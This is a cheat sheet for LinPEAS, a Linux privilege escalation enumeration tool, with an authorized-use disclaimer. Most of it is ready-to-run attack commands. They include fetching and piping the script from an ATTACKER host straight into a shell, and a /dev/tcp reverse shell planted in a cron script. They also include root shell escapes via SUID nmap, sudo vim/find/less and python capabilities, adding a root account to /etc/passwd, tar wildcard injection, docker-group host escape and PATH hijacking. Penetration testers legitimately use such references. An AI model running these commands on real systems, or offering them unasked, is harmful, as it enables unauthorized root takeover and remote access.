LINPEAS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
LinPEAS is a script for Linux privilege escalation enumeration. Part of the PEASS-ng suite for finding misconfigurations.
DOWNLOAD#
# From GitHub curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh # Alternative wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
TRANSFER TO TARGET#
WEB SERVER#
# On attacker python3 -m http.server 8000 # On target wget http://ATTACKER:8000/linpeas.sh curl http://ATTACKER:8000/linpeas.sh -o linpeas.sh chmod +x linpeas.sh
EXECUTION WITHOUT TOUCHING DISK#
# Download and execute in memory curl http://ATTACKER:8000/linpeas.sh | sh # With bash curl http://ATTACKER:8000/linpeas.sh | bash # Base64 encoded cat linpeas.sh | base64 -w0 # On target: echo "BASE64_CONTENT" | base64 -d | bash
BASIC USAGE#
# Run all checks ./linpeas.sh # Quiet mode (less output) ./linpeas.sh -q # Superfast (only critical checks) ./linpeas.sh -s # With password for sudo checks ./linpeas.sh -P 'password' # Output to file ./linpeas.sh | tee linpeas_output.txt # No colors (for file output) ./linpeas.sh -N | tee linpeas_output.txt
OPTIONS#
-h Help -q Quiet mode -s Superfast (critical checks only) -P PASS Password for sudo -N No colors -a All checks (including slow) -e Extra enumeration -t Automatic network scan -r Regular expression for searching -d Debug mode -o OUTPUT Only execute selected checks
SELECTIVE CHECKS#
# Specific checks only ./linpeas.sh -o system_information ./linpeas.sh -o container ./linpeas.sh -o cloud ./linpeas.sh -o procs_crons_timers_srvcs_sockets ./linpeas.sh -o network_information ./linpeas.sh -o users_information ./linpeas.sh -o software_information ./linpeas.sh -o interesting_files ./linpeas.sh -o api_keys_regex
CHECK CATEGORIES#
SYSTEM INFORMATION#
# Kernel version and exploits # OS release # Sudo version # PATH hijacking # Date and uptime # Environment variables
CONTAINER/VM DETECTION#
# Docker container detection # LXC container # Virtual machine # Cloud environment (AWS, GCP, Azure)
AVAILABLE SOFTWARE#
# Installed packages # Useful binaries # Compilers (gcc, python, perl) # Development tools
PROCESSES/CRONS/SERVICES#
# Running processes # Cron jobs (all users) # Systemd timers # Active services # Open ports # Socket files
NETWORK INFORMATION#
# Network interfaces # IP addresses # Routing table # ARP cache # Open ports # Active connections
USERS INFORMATION#
# Current user info # All users # Groups # Sudo permissions # SSH keys # Password policy # Login history
INTERESTING FILES#
# SUID/SGID binaries # Capabilities # Writable files in PATH # Sensitive file permissions # Config files # Database files # Backup files # Password files # SSH private keys # AWS/cloud credentials
OUTPUT COLORS#
# RED/YELLOW - 95% PE vector # RED - High probability PE # CYAN - Files with credentials # GREEN - Uncommon but interesting # LIGHT_YELLOW - Users with console # LIGHT_GREY - Other users
COMMON FINDINGS#
SUID BINARIES#
# Look for: # - GTFOBins entries # - Custom SUID binaries # - Uncommon SUID # Exploit example (nmap SUID) nmap --interactive !sh
WRITABLE FILES#
# /etc/passwd writable echo 'newroot:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd # Writable /etc/shadow # Replace root hash # Writable cron files echo '* * * * * root /tmp/shell.sh' >> /etc/cron.d/job
CAPABILITIES#
# cap_setuid
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_net_raw
# Sniff traffic
# cap_dac_read_search
# Read any file
SUDO MISCONFIGURATION#
# sudo -l output # (ALL) NOPASSWD: /usr/bin/vim sudo vim -c ':!/bin/bash' # (ALL) NOPASSWD: /usr/bin/find sudo find . -exec /bin/bash \; # (ALL) NOPASSWD: /usr/bin/less sudo less /etc/passwd !/bin/bash
PATH HIJACKING#
# Writable directory in PATH export PATH=/tmp:$PATH echo '/bin/bash' > /tmp/cmd chmod +x /tmp/cmd # Wait for privileged process to call 'cmd'
CRON JOB ABUSE#
# Writable cron script echo '/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /opt/backup.sh # Wildcard injection # cron: tar czf /backup/backup.tar.gz * echo "" > "--checkpoint=1" echo "" > "--checkpoint-action=exec=sh shell.sh"
DOCKER ESCAPE#
# User in docker group docker run -v /:/mnt --rm -it alpine chroot /mnt sh # docker.sock accessible docker -H unix:///var/run/docker.sock run -v /:/mnt -it alpine chroot /mnt
KERNEL EXPLOITS#
# Check kernel version uname -a # Common exploits: # - DirtyCow (CVE-2016-5195) # - DirtyPipe (CVE-2022-0847) # - PwnKit (CVE-2021-4034)
INTEGRATION#
# With Metasploit # Upload and run via Meterpreter upload linpeas.sh /tmp/linpeas.sh shell chmod +x /tmp/linpeas.sh /tmp/linpeas.sh # Save output for analysis ./linpeas.sh -N > /tmp/linpeas.txt # Download and analyze
QUICK REFERENCE#
./linpeas.sh # Run all checks ./linpeas.sh -s # Fast scan ./linpeas.sh -q # Quiet mode ./linpeas.sh -P 'pass' # With sudo password ./linpeas.sh -N | tee out.txt # Save output curl URL/linpeas.sh | sh # Memory execution